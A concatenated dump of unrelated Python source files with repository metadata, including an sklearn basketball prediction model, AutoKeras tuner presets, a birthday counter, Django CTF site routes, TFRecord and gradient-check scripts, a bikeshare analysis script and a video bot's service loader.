answer = [[i+1,np.argmax(result[i])] for i in range(lenth)]
dataframe = pd.DataFrame({'ImageId':[answer[i][0] for i in range(lenth)],'Label':[answer[i][1] for i in range(lenth)]})
dataframe.to_csv("submit.csv",index = False) | UTF-8 | Python | false | false | 1,707 | py | 6 | digi_recognize.py | 5 | 0.670901 | 0.641258 | 0 | 51 | 31.431373 | 123 |
kalyons11/march-madness | 16,690,242,933,358 | 8697a0038546783d877b80aeea971c82b0ec6080 | 64ab9e962325285406477f9fd2ca22ad427c8054 | /classes/model.py | 896393668b833856f797a598316dd08018f09c10 | [
"MIT"
]
| permissive | https://github.com/kalyons11/march-madness | 5d97e09f4eb7f70fb9ad12d9cd68d15f80cfbfb8 | 3171813785fb5915aa5240d4c507210e816d22f4 | refs/heads/master | 2020-03-10T09:49:26.794378 | 2018-05-11T03:44:49 | 2018-05-11T03:44:49 | 129,319,462 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report, roc_curve, auc
from sklearn.model_selection import train_test_split
from .feature import Feature
from .feature_vector import FeatureVector
from .game_context import GameContext
class Model:
"""Represents one of our models."""
def __init__(self, name, features, model_type='LogisticRegression',
mode='sub'):
"""
name: name of this model, for debugging purposes
features: list[Feature] for this model
model_type: .
"""
self.name = name
self.features = features
self.model_type = model_type
self._sklearn_model = None
self.mode = mode
@property
def sklearn_model(self):
if self._sklearn_model is not None:
return self._sklearn_model
elif self.model_type == "LogisticRegression":
self._sklearn_model = LogisticRegression()
elif self.model_type == "RandomForestClassifier":
self._sklearn_model = RandomForestClassifier()
return self._sklearn_model
@classmethod
def default(cls):
return cls('default_linear',
[Feature('ppg', lambda df: df['score'].mean())])
def get_vector(self, season, team, other, dm):
"""
season: Season object
team: Team object
dm: DataManager
returns: FeatureVector filtered on season and team, aggregated
accordingly
"""
# compute each feature and append to result dict
result = {}
for f in self.features:
result[f] = f.compute(dm, team, GameContext(team, other, season))
return FeatureVector(result)
def get_X_y(self, trainer):
X, y = [], []
# X is list of FeatureVector
# y is 1/0 values
data_raw = trainer.dm.get_training_data()
for result in data_raw:
vect_a = self.get_vector(result.season, result.winner,
result.loser, trainer.dm)
vect_b = self.get_vector(result.season, result.loser,
result.winner, trainer.dm)
vect_combo_a = self.combine_vectors(vect_a, vect_b)
X.append(vect_combo_a.to_list())
y.append(1)
vect_combo_b = self.combine_vectors(vect_b, vect_a)
X.append(vect_combo_b.to_list())
y.append(0)
return np.array(X), np.array(y)
def train(self, trainer):
# Need to do the following:
# 1. Parse data
X, y = self.get_X_y(trainer)
# 2. Split data
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.2, random_state=42)
#import pdb; pdb.set_trace()
# 3. Fit on training
self.sklearn_model.fit(X_train, y_train)
# 3. Evaluate on testing
y_pred = self.sklearn_model.predict(X_test)
# 3A. ROC/AUC
self.generate_roc_auc_curve(y_test, y_pred)
# 4. Return evaluation result
return classification_report(y_test, y_pred)
# score = self.sklearn_model.score(X_test, y_test)
def predict(self, a, b, runner):
"""
a: Team a
b: Team b
runner: runner calling me
returns: 0/1 - 1 if a wins, 0 else
"""
vect_a = self.get_vector(runner.season, a, b, runner.dm)
vect_b = self.get_vector(runner.season, b, a, runner.dm)
vect_combo = self.combine_vectors(vect_a, vect_b)
X = [vect_combo.to_list()]
result = self._sklearn_model.predict(X)
return result[0]
def combine_vectors(self, a, b):
"""
a, b: FeatureVector's
returns: combination of a and b
"""
if self.mode == 'sub':
return a - b
elif self.mode == 'concat':
return a.concat(b)
def generate_roc_auc_curve(self, y_true, y_pred):
lw = 2
fpr, tpr, _ = roc_curve(y_true, y_pred)
roc_auc = auc(fpr, tpr)
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title(f'Receiver operating characteristic of model {self.name}')
plt.legend(loc="lower right")
plt.show()
| UTF-8 | Python | false | false | 4,647 | py | 26 | model.py | 18 | 0.570906 | 0.563374 | 0 | 133 | 33.93985 | 77 |
TAIPANBOX/autokeras | 901,943,171,482 | 42ae8cabf2399a0eac06aaac5cda99e40daeddc3 | 2d8b7a06a510776d3f83b3c39ea62128c6b49f19 | /autokeras/tuners/task_specific.py | c015ca9aa7c9354b5628821aa5ee729e6ea25e7d | [
"MIT"
]
| permissive | https://github.com/TAIPANBOX/autokeras | ac3dbad01aa9d07140bcfc2280160e426f0606ce | fba4c190a846e84a6dcf460d1dc2aad0c739705c | refs/heads/master | 2022-07-11T02:46:14.001874 | 2020-05-17T22:10:09 | 2020-05-17T22:10:47 | 265,168,850 | 3 | 0 | MIT | true | 2020-05-19T06:52:39 | 2020-05-19T06:52:38 | 2020-05-19T06:52:36 | 2020-05-19T05:12:08 | 40,303 | 0 | 0 | 0 | null | false | false | from autokeras.tuners import greedy
IMAGE_CLASSIFIER = [{
'image_block_1/block_type': 'vanilla',
'image_block_1/normalize': True,
'image_block_1/augment': False,
'image_block_1/conv_block_1/kernel_size': 3,
'image_block_1/conv_block_1/num_blocks': 1,
'image_block_1/conv_block_1/num_layers': 2,
'image_block_1/conv_block_1/max_pooling': True,
'image_block_1/conv_block_1/separable': False,
'image_block_1/conv_block_1/dropout_rate': 0.25,
'image_block_1/conv_block_1/filters_0_0': 32,
'image_block_1/conv_block_1/filters_0_1': 64,
'classification_head_1/spatial_reduction_1/reduction_type': 'flatten',
'classification_head_1/dropout_rate': 0.5,
'optimizer': 'adam'
}, {
'image_block_1/block_type': 'resnet',
'image_block_1/normalize': True,
'image_block_1/augment': True,
'image_block_1/image_augmentation_1/horizontal_flip': True,
'image_block_1/image_augmentation_1/vertical_flip': True,
'image_block_1/res_net_block_1/version': 'v2',
'image_block_1/res_net_block_1/pooling': 'avg',
'image_block_1/res_net_block_1/conv3_depth': 4,
'image_block_1/res_net_block_1/conv4_depth': 6,
'classification_head_1/dropout_rate': 0,
'optimizer': 'adam'
}]
TEXT_CLASSIFIER = [{
'text_block_1/vectorizer': 'sequence',
'classification_head_1/dropout_rate': 0,
'optimizer': 'adam',
'text_block_1/max_tokens': 5000,
'text_block_1/conv_block_1/separable': False,
'text_block_1/text_to_int_sequence_1/output_sequence_length': 512,
'text_block_1/embedding_1/pretraining': 'none',
'text_block_1/embedding_1/embedding_dim': 64,
'text_block_1/embedding_1/dropout_rate': 0.25,
'text_block_1/conv_block_1/kernel_size': 5,
'text_block_1/conv_block_1/num_blocks': 1,
'text_block_1/conv_block_1/num_layers': 1,
'text_block_1/conv_block_1/max_pooling': False,
'text_block_1/conv_block_1/dropout_rate': 0,
'text_block_1/conv_block_1/filters_0_0': 256,
'text_block_1/spatial_reduction_1/reduction_type': 'global_max',
'text_block_1/dense_block_1/num_layers': 1,
'text_block_1/dense_block_1/use_batchnorm': False,
'text_block_1/dense_block_1/dropout_rate': 0.5,
'text_block_1/dense_block_1/units_0': 256,
}]
class ImageClassifierTuner(greedy.Greedy):
def __init__(self, **kwargs):
super().__init__(
initial_hps=IMAGE_CLASSIFIER,
**kwargs)
class TextClassifierTuner(greedy.Greedy):
def __init__(self, **kwargs):
super().__init__(
initial_hps=TEXT_CLASSIFIER,
**kwargs)
| UTF-8 | Python | false | false | 2,595 | py | 80 | task_specific.py | 56 | 0.647399 | 0.599615 | 0 | 67 | 37.731343 | 74 |
s4swadhin/TalkPythonToMe | 2,946,347,613,261 | 4a0d1b51727184fff4d30773b609ca9782a77fa3 | 973c3a34e0bb25fabdf10edfb3211c4160ff319e | /Birthday_Countdown/program.py | 4a79af4a67d53424c43f4dbb2672f4e57a5bdeef | []
| no_license | https://github.com/s4swadhin/TalkPythonToMe | 2218c4cd1deaf0341bc5632adbe8176709330207 | 86a08b59dfe00787eee66f3b2260c301f4ac8af3 | refs/heads/master | 2019-08-22T22:00:36.801193 | 2016-06-10T14:12:29 | 2016-06-10T14:12:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import datetime
def print_header():
print('-------------------------------------')
print(' Birhtday Counter')
print('-------------------------------------')
def get_birthday_from_user():
print('Tell us when you are born: ')
year = int(input('Year [YYYY]: '))
month = int(input('Month [MM]: '))
day = int(input('Day [DD]: '))
birthday = datetime.datetime(year, month, day)
print('Entered date for bith is {0}'.format(birthday))
return birthday
def compute_days_between_dates(original_date, now):
dt = now - datetime.datetime(now.year,
original_date.month, original_date.day)
days = int(dt.total_seconds() / 60 / 60 / 24)
return days
def print_birthday_information(days):
if days < 0:
print('Your birthday is in {0} days'.format(-days))
elif days > 0:
print('You already had your birthday this year, It was {0} days ago.'.format(days))
else:
print('Happy Birthday !!!')
def main():
print_header()
bday = get_birthday_from_user()
now = datetime.datetime.now()
no_of_days = compute_days_between_dates(bday, now)
print_birthday_information(no_of_days)
main() | UTF-8 | Python | false | false | 1,213 | py | 9 | program.py | 6 | 0.570486 | 0.561418 | 0 | 43 | 27.232558 | 91 |
maroodb/allsafe-ctf | 2,937,757,642,448 | ee98abe0eb01ca7dd991541aa1a057a27fc9bbd3 | 4c044acdce8d83cc240e8b6221ec394c70d5400a | /ctf/urls.py | 774ba37b06b6561ce3e36fadc08bdbca9b4dc5ce | []
| no_license | https://github.com/maroodb/allsafe-ctf | 4d94b0e6772c51bbf0ff662d01474e970563f3a1 | 3893bb64203b7c28285467d1b7ff0ad149b204d9 | refs/heads/master | 2021-07-14T11:04:16.225012 | 2019-09-13T08:26:18 | 2019-09-13T08:26:18 | 150,078,611 | 1 | 0 | null | false | 2020-06-05T23:23:30 | 2018-09-24T09:14:48 | 2019-09-13T08:27:14 | 2020-06-05T23:23:28 | 118,330 | 0 | 0 | 2 | JavaScript | false | false | from django.conf.urls import url
from ctf.views import scoreboard, upload, challenges, ctf_resolve, challenge_details
urlpatterns = [
url(r'^scoreboard/', scoreboard),
url(r'^upload/', upload),
url(r'^challenges/$', challenges),
url(r'^challenges/(?P<id_ch>\d+)$', challenge_details, name='challenge_details'),
url(r'^submit/(?P<id_ch>\d+)$', ctf_resolve, name='resolve_challenge'),
]
| UTF-8 | Python | false | false | 411 | py | 73 | urls.py | 54 | 0.666667 | 0.666667 | 0 | 15 | 26.4 | 85 |
Ziva1811/BikeShare | 15,891,379,036,118 | b129365178159c4e7b21afe875ba4f11a2ba0992 | f134ed5baab5f7c792562722900f49752ea68b6f | /bikeshare.py | c707036d787480696c0fc308f25d53f4df18ad64 | []
| no_license | https://github.com/Ziva1811/BikeShare | 8fc6a9b7a9ffa839c2a8f66b6e1c6059dea5f7e2 | d153c3fba45a03e9962091808edc280ebf8985ee | refs/heads/master | 2020-04-02T17:34:06.824901 | 2018-10-28T07:33:40 | 2018-10-28T07:33:40 | 154,662,564 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv' }
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
city=' '
while city.lower() not in ['chicago', 'new york', 'washington']:
city = input('\nHello! Let\'s explore some US bikeshare data!\n'
'Would you like to see data for Chicago, New York, or'
' Washington?\n').lower()
if city in ["chicago", "washington","new york"]:
break
else:
print("Please enter the name of city either Chicago,Washington or New York")
month=' '
while month.lower() not in ['january','february','march','april','may','june']:
month=input("Enter any month from January to June").lower()
day=' '
while day.lower() not in ['sunday','monday','tuesday','wednesday','thursday','friday','saturday']:
day=input("Enter any day of a week").lower()
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
df=pd.read_csv(CITY_DATA[city])
df['Start Time']=pd.to_datetime(df['Start Time'])
df['month']=df['Start Time'].dt.month
df['Week_Day']=df['Start Time'].dt.dayofweek
df['Hour']=df['Start Time'].dt.hour
if month != 'all':
month = MONTHS.index(month) + 1
df = df[ df['month'] == month ]
if day != 'all':
df = df[ df['Week_Day'] == day.title()]
return df
def time_stats(df):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
most_common_month=df['month'].value_counts().idxmax()
print('\n The most common month is:',most_common_month)
most_common_weekDay=df['Week_Day'].value_counts().idxmax()
print('\n The most common month is:',most_common_month)
most_common_hour=df[hour].value_counts().idxmax()
print('\n The most common month is:',most_common_month)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(df):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
most_common_start_station = df['Start Station'].value_counts().idxmax()
print("The most commonly used start station :", most_common_start_station)
most_common_end_station = df['End Station'].value_counts().idxmax()
print("The most commonly used end station :", most_common_end_station)
most_common_start_end_station = df[['Start Station', 'End Station']].mode().loc[0]
print("The most commonly used start station and end station : {}, {}"\
.format(most_common_start_end_station[0], most_common_start_end_station[1]))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
total_travel = df['Trip Duration'].sum()
d=total_travel/(3600*24)
h=total_travel/3600
m=total_travel/60
print("Total time travel: "+ str(d)+"day(s)b"+str(h)+ "hour(s) "+str(m)+ "minute(s).")
mean_travel = df['Trip Duration'].mean()
md=mean_travel/(3600*24)
mh=mean_travel/3600
mm=mean_travel/60
print("Mean travel time: "+ str(md)+"day(s)b"+str(mh)+ "hour(s) "+str(mm)+ "minute(s).")
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
user_type=df['User Type'].vaue_counts()
for index, user_count in enumerate(user_counts):
print(" {}: {}".format(user_counts.index[index], user_count))
print("Travel time for each user type:\n")
group_by_user_trip = df.groupby(['User Type']).sum()['Trip Duration']
for index, user_trip in enumerate(group_by_user_trip):
print(" {}: {}".format(group_by_user_trip.index[index], user_trip))
if 'Gender' in df.columns:
male_count = df.query('gender == "Male"').gender.count()
female_count = df.query('gender == "Female"').gender.count()
print('There are {} male users and {} female users.'.format(male_count, female_count))
if 'Birth Year' in df.columns:
birth_year = df['Birth Year']
most_common_year = birth_year.value_counts().idxmax()
print("The most common birth year:", most_common_year)
most_recent = birth_year.max()
print("The most recent birth year:", most_recent)
earliest_year = birth_year.min()
print("The most earliest birth year:", earliest_year)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def display(df):
n=0
d=input("Would you like to view 5 rows of data").lower()
while True:
if d=='yes' or d=='y':
n=n+5
print(df.head(n))
elif d=='no' or d=='n':
break
else:
print("Please enter a valid input either yes/y or no/n:")
continue
d=input("Do you want to again view the 5 rows of data")
return
def main():
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df)
station_stats(df)
trip_duration_stats(df)
user_stats(df)
#displaying five rows of data on user's lke
display(df)
restart = input('\nWould you like to restart? Enter yes or no.\n')
while restart.lower() not in ['yes', 'no']:
print("Invalid input. Please type 'yes' or 'no'.")
restart = input('\nWould you like to restart? Type \'yes\' or \'no\'.\n')
if restart.lower() == 'yes':
main()
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 6,955 | py | 2 | bikeshare.py | 1 | 0.583178 | 0.577139 | 0 | 235 | 28.595745 | 102 |
vcp-kurhessen/Pfadiralala-IV | 19,378,892,448,212 | e21a5240f43826b95a84d89e3088ab553ada3579 | 1e5798fe2191f198f8a312a602601aa58c70d9c2 | /Tools/txt2Latex/config/metakeys.py | 79ec524942f40c61f43c743a1c5b0002865b8bba | [
"MIT"
]
| permissive | https://github.com/vcp-kurhessen/Pfadiralala-IV | 597add15b5bf43460fd97f790918f70f6b7768e8 | 66ae5de12c59bfa1da83edcc2c5cc6ecd962ceb5 | refs/heads/master | 2023-07-10T01:36:09.811290 | 2023-06-24T14:58:38 | 2023-06-24T14:58:38 | 50,174,511 | 29 | 14 | null | false | 2022-10-12T11:46:49 | 2016-01-22T10:27:48 | 2022-08-23T10:34:19 | 2022-10-12T11:46:49 | 383,847 | 23 | 13 | 6 | TeX | false | false | # Schlüssel für metaangaben, die im Titelblock eines Liedes Vorkommen dürfen. siehe auch die Definition in lib/Heuristik/Heuristik.py
metakeys = dict( # Siehe auch liste in Heuristik.py
ww='wuw', # Worte und weise
wuw='wuw',
jahr='jahr', # jahr des Liedes
j='jahr',
mel='mel', # Autor der Melodie
melodie='mel',
weise='mel',
melj='meljahr', # Jahr der Melodie
meljahr='meljahr',
weisej='meljahr',
weisejahr='meljahr',
txt='txt', # Autor des Textes
text='txt',
worte='txt',
txtj='txtjahr', # Jahr des Textes
textj='txtjahr',
txtjahr='txtjahr',
textjahr='txtjahr',
wortejahr='txtjahr',
wortej='txtjahr',
alb='alb', # Album, auf dem das Lied erschienen ist.
album='alb',
lager='lager', # Lager, auf dem / für das das Lied geschrieben
tonart='tonart', # originaltonart
capo='capo', # vorschlag für das setzen des Capos
cap='capo', # TODO: in Latex setzen
key='tonart',
bo='bo', # Seite im Bock
bock='bo',
cp='cp', # Seite iom Codex Pathomomosis
codex='cp',
pf1='pfi', # Seite im Pfadiralala1
pfi='pfi',
pf='pfi',
pf2='pfii', # Seite im Pfadiralala2
pfii='pfii',
pf3='pfiii', # Seite im Pfadiralala3
pfiii='pfiii',
pf4='pfiv',
pfiiii='pfiv',
pfiv='pfiv',
pf4p='pfivp',
pfiiiip='pfivp',
pfivp='pfivp',
ju='ju', # Seite in der Jurtenburg
jurten='ju',
jurtenburg='ju',
gruen='gruen', # Seite Im Grünen (Liederbuch)
grün='gruen',
gruenes='gruen',
grünes='gruen',
kss4='kssiv', # Seite in Kinder-Schoko-Songs 4
kssiv='kssiv',
kssiiii='kssiv',
siru='siru', # Seite in Die singende Runde
biest='biest', # Seite im Biest
eg='eg', # Seite im evangelischen Gesangbuch
evg='eg',
egp='egplus', # Seite Im evangelischen Gesangbuch plus
evgp='egplus',
egplus='egplus',
evgplus='egplus',
tf='tf',
turm='tf',
turmfalke='tf',
gb='gb',
gnorken='gb',
gnorkenbüdel='gb')
| UTF-8 | Python | false | false | 2,059 | py | 584 | metakeys.py | 18 | 0.597561 | 0.592683 | 0 | 71 | 27.873239 | 133 |
Vishal-kilaskar/job_assignments | 5,196,910,478,842 | f543518dd1febeb51a2452268971dfec7b74339e | f9d60e93286244ebb16f56f35ee089ddb8bd85d6 | /korangle/movie_data/urls.py | fb511ee6aeed205422606139f2b802e621c59e2f | []
| no_license | https://github.com/Vishal-kilaskar/job_assignments | 90c26313e86d83408909ac0a11da12be9d163e64 | 8c579eb9ac4a915e37db735f47fd15c1ad6bbf5c | refs/heads/master | 2023-02-13T12:37:47.603795 | 2021-01-07T13:13:29 | 2021-01-07T13:13:29 | 318,994,444 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.home),
path('api/get_data/', views.get_data),
path('api/post_data/', views.post_data)
] | UTF-8 | Python | false | false | 179 | py | 22 | urls.py | 14 | 0.653631 | 0.653631 | 0 | 7 | 24.714286 | 43 |
zt1112/pytorch_inceptionv3 | 13,194,139,579,284 | b647eb3b7eca046154fd6c5c7ae0c74b8f84d378 | 8025816040aeb1d845e17e6a4d780ae2a8668ef3 | /data/gentxt | 7754bc1f182e8867f7cdfc00beaa30974f48f461 | []
| no_license | https://github.com/zt1112/pytorch_inceptionv3 | 24714ee84bcc4775b8c74429c06fb38a7e653eb6 | bd3a7afe1cb6e9db8ef3a2f48ecf34666bdfaddf | refs/heads/master | 2020-03-20T13:26:32.403181 | 2018-01-19T06:12:15 | 2018-01-19T06:12:15 | 137,455,812 | 4 | 0 | null | true | 2018-06-15T07:31:55 | 2018-06-15T07:31:55 | 2018-06-07T03:23:43 | 2018-01-19T06:12:16 | 10 | 0 | 0 | 0 | null | false | null | #!/usr/bin/python
#-*-coding:utf8-*-
import os
with open('label2.txt','r') as f:
text = f.read()
dic = text.split(',')
files =os.listdir('./val/')
print(len(files))
f = open('val_label.txt','w')
for file in files:
a = file.split('_')[0]
f.write(file+' '+a+'\n')
f.close()
| UTF-8 | Python | false | false | 286 | 6 | gentxt | 4 | 0.566434 | 0.555944 | 0 | 17 | 15.588235 | 33 |
|
DianYu420376/Full-Backprop-Test-on-20-News-1 | 17,171,279,254,241 | 5fdbc55644b9feb9d771ed62ee8fe78e18dd9712 | 000ca12a989d7bd96426a421099d5f036dda6130 | /Test_20NewsGroup/check_gradient.py | 3f1f71b12e7daa535d838850e1612525c6ce2665 | []
| no_license | https://github.com/DianYu420376/Full-Backprop-Test-on-20-News-1 | 25a53ca1bd20fbeba292b0c3a73e934d619a51f9 | 059b0cb48c2d0774c9ab42516cba73ad2212a71c | refs/heads/master | 2020-03-25T00:38:29.594455 | 2018-08-08T16:35:09 | 2018-08-08T16:35:09 | 143,196,357 | 0 | 0 | null | false | 2018-08-06T16:13:37 | 2018-08-01T18:57:53 | 2018-08-06T03:50:09 | 2018-08-06T16:13:37 | 207,624 | 0 | 0 | 0 | Jupyter Notebook | false | null |
# coding: utf-8
# In[11]:
# debugging the supervised version of deep NMF
import sys
package_dir = '../full_backprop_package/'
sys.path.append(package_dir)
import torch
from torch.autograd import Variable
from auxillary_functions import *
from pinv import PinvF
import numpy as np
from writer import Writer
from matplotlib import pyplot as plt
from lsqnonneg_module import LsqNonneg, LsqNonnegF
from deep_nmf import Fro_Norm
from pinv import PinvF
import torch.nn as nn
from twenty_news_group_data_loading import Y, target
# In[38]:
# Testing on random generated dataset to see if it is the misuse of pytorch that caused the problem
# Interesting Fact : L2 norm and crossentropy are completely different! For crossentropy it can get the 400 sample right,
# but the L2 just get around 310 at most
# The loss curve for crossentropy is super weird... still looking into what has happened
# Doing it stochastically doesn't seem to affect the accuracy.
m = 100
n = 400
k = 20
net = LsqNonneg(m,k)
cr1 = Fro_Norm()
cr2 = Fro_Norm()
cr3 = nn.CrossEntropyLoss()
data = torch.abs(torch.randn(n, m)).double()
label = torch.from_numpy(Y[0:n,:]).double()
data, label = Variable(data), Variable(label)
label = torch.from_numpy(target[0:n]).long()
#label = torch.from_numpy(Y[0:n,:]).double()
W = Variable(torch.randn(k,k).double(),requires_grad = True)
epoch = 1000
lr = 10000
loss_lst = []
grad_lst = []
for epo in range(epoch):
net.zero_grad()
randperm = torch.randperm(n)
data_shuffle = data[randperm, :]
label_shuffle = label[randperm]
for i in range(1):
inputs = data_shuffle[i*n:(i+1)*n,:]
#label_ = label[i*400:(i+1)*400,:]
label_ = label_shuffle[i*n:(i+1)*n]
net.zero_grad()
S = net(inputs)
#pred = torch.mm(S,torch.mm(f(S),label_))
pred = torch.mm(S,W)
classification = cr3(pred, label_)
loss = classification
loss.backward()
print(epo, i, loss.data)
sys.stdout.flush()
loss_lst.append(loss.data)
if epo > 500 and loss.data/loss_lst[epo-1] >= 10:
# check gradient
grad_A = torch.zeros(grad_true_A.shape)
delta = 1e-6
f = LsqNonnegF.apply
for i in range(grad_A.shape[0]):
for j in range(grad_A.shape[1]):
A = A_previous
A_delta = A.clone()
A_delta[i,j] += delta
S_delta = f(inputs_previous, A_delta)
pred_delta = torch.mm(S_delta, W_previous)
loss_delta = cr3(pred_delta, label_previous)
grad_A[i,j] = (loss_delta - loss_previous)/delta
grad_error = torch.norm(grad_A - grad_true_A.float())
print('the error betweem grad and numeric grad:')
print(grad_error)
sys.stdout.flush()
grad_lst.append(grad_error)
np.savez('saved_data/check_gradient',loss_lst = loss_lst, grad_lst = grad_lst)
A_previous = net.A.data.clone()
inputs_previous = inputs.data.clone()
label_previous = label_.data.clone()
loss_previous = loss.data.clone()
grad_true_A = net.A.grad.data.clone()
W_previous = W.data.clone()
net.A.data = net.A.data.sub_(lr*net.A.grad.data)
net.A.data = net.A.data.clamp(min = 0)
W.data = W.data.sub_(lr*W.grad.data)
W.grad.zero_()
# In[39]:
# S = net(data)
# #pred = torch.mm(S,torch.mm(f(S),label))
# pred = torch.mm(S,W)
# #torch.sum(torch.argmax(label,1)== torch.argmax(pred,1))
# torch.sum(label == torch.argmax(pred,1))
# print(torch.sum(label == torch.argmax(pred,1)))
# plt.plot(loss_lst)
# plt.show()
| UTF-8 | Python | false | false | 3,745 | py | 28 | check_gradient.py | 17 | 0.608812 | 0.591455 | 0 | 120 | 30.191667 | 121 |
torms3/instance_segmentation_with_pixel_embeddings | 12,249,246,731,663 | 0e5f90e995d86bda9562f263a6884f2848623d82 | 214760d3005eba69d0f58e40f9eab1e31e9bbca4 | /check_tfrecords.py | 76aa0a31af0a4daed9831aad802c00b33cfc0435 | [
"MIT"
]
| permissive | https://github.com/torms3/instance_segmentation_with_pixel_embeddings | 8eb1bff948d584ebacecd6b9a51831ce447e7274 | befaeb9e0a6e79213b4da3d5c5ce5a7c21b0b070 | refs/heads/master | 2021-04-07T03:40:00.036873 | 2019-11-26T14:04:10 | 2019-11-26T14:04:10 | 248,641,816 | 1 | 0 | MIT | true | 2020-03-20T01:31:04 | 2020-03-20T01:31:03 | 2019-11-26T14:04:20 | 2019-11-26T14:04:18 | 133,839 | 0 | 0 | 0 | null | false | false | import tensorflow as tf
import numpy as np
import cv2
import os
import glob
import time
import shutil
from preprocess import extract_fn
from utils.img_io import save_indexed_png
dist_map_included = True
# dataset_dir = "./tfrecords/U2OScell/train"
# image_channels = 1
# image_depth = 'uint16'
dataset_dir = "./tfrecords/CVPPP2017/train"
image_channels = 3
image_depth = 'uint8'
test_dir = "./tfrecords_check"
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
time.sleep(1)
tfrecords = [os.path.join(dataset_dir, f)
for f in os.listdir(dataset_dir) if os.path.isfile(os.path.join(dataset_dir, f))]
dataset = tf.data.TFRecordDataset(tfrecords)
dataset = dataset.map(lambda x: extract_fn(x, image_channels=image_channels, image_depth=image_depth, dist_map=dist_map_included))
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with tf.Session() as sess:
for i in range(100):
sample = sess.run(next_element)
print(sample['image/filename'].decode("utf-8")+": height {}, width {}".format(sample['image/height'], sample['image/width']))
print("objects in total: {}".format(sample['image/obj_count']))
cv2.imwrite(os.path.join(test_dir, 'image'+str(i)+'.tif'), sample['image/image'])
save_indexed_png(os.path.join(test_dir, 'label'+str(i)+'.png'), sample['image/label'].astype(np.uint8))
if dist_map_included:
cv2.imwrite(os.path.join(test_dir, 'dist'+str(i)+'.png'), sample['image/dist_map']*255)
# print(sample['image/neighbor'][:,0:10])
| UTF-8 | Python | false | false | 1,589 | py | 23 | check_tfrecords.py | 22 | 0.679043 | 0.66331 | 0 | 46 | 33.543478 | 133 |
ArchiveTeam/VideoBot | 11,115,375,384,255 | 26b9acc70846cebc739578f2723b04a1b6e3cf5d | f0b50eb2e6491220da62af916088855fa2e6408c | /refresh.py | ea696b1b2bc2273c2f53430305712b9ec97570eb | []
| no_license | https://github.com/ArchiveTeam/VideoBot | aa63c02f0ce6039e0c494346091c498251fec448 | ad504e03c941c9a1ed7bc5c037f2336c4c9bc160 | refs/heads/master | 2021-01-17T07:09:51.056362 | 2017-12-03T00:59:18 | 2017-12-03T00:59:18 | 52,161,461 | 11 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | from config import irc_channel
from config import github
import os
import services
import time
import re
import irc_bot
import periodical_jobs
import random
import string
import threading
import functions
periodical_job_start = lambda filename, type_, user: functions.periodical_job.periodical_job_start(filename, type_, user)
services_count = 0
services_list = [['service_name', 'service_regex', ['service_commands']]]
periodical_jobs_list = [['perjob_name', 'refreshtime']]
periodical_jobs_start = {}
def irc_bot_print(channel, message):
irc_bot.irc_bot_print(channel, message)
def refresh_services():
global services_list
global services_count
services_list = [['service_name', 'service_regex', ['service_commands']]]
new_services = 0
#if os.path.isdir('./services'):
# shutil.rmtree('./services')
#os.system('git clone ' + github + '.git')
#repository_name = re.search(r'([^\/]+)\/?$', github).group(1)
#shutil.copytree('./' + repository_name + '/services', './services')
#shutil.rmtree('./' + repository_name)
reload(services)
for root, dirs, files in os.walk("./services"):
for service in files:
if service.startswith("video__") and service.endswith(".py"):
if service[:-3] in services_list:
break
else:
try:
url_regex = eval('services.' + service[:-3] + '.url_regex')
except AttributeError:
url_regex = None
service_commands = eval('services.' + service[:-3] + '.service_commands')
services_list.append([service[:-3], url_regex, service_commands])
new_services += 1
print('Found service ' + service[:-3] + '.')
new_count = new_services-services_count
services_count = new_services
if new_count == 1:
irc_bot_print(irc_channel, 'Found and updated ' + str(new_count) + ' service.')
elif new_count != 0:
irc_bot_print(irc_channel, 'Found and updated ' + str(new_count) + ' services.')
def refresh_periodical_jobs():
global periodical_jobs_list
while True:
periodical_jobs_list_ = [['perjob_name', 'refreshtime']]
random_string = ''.join(random.choice(string.ascii_lowercase) for num in range(10))
for filename in os.listdir('periodical_jobs'):
if filename.endswith('.py') and filename not in ('check_temp_perjob.py', '__init__.py'):
filename_ = filename.replace('.py', random_string + '.py')
os.rename('periodical_jobs/' + filename, 'periodical_jobs/' + filename_)
reload(periodical_jobs)
time.sleep(10)
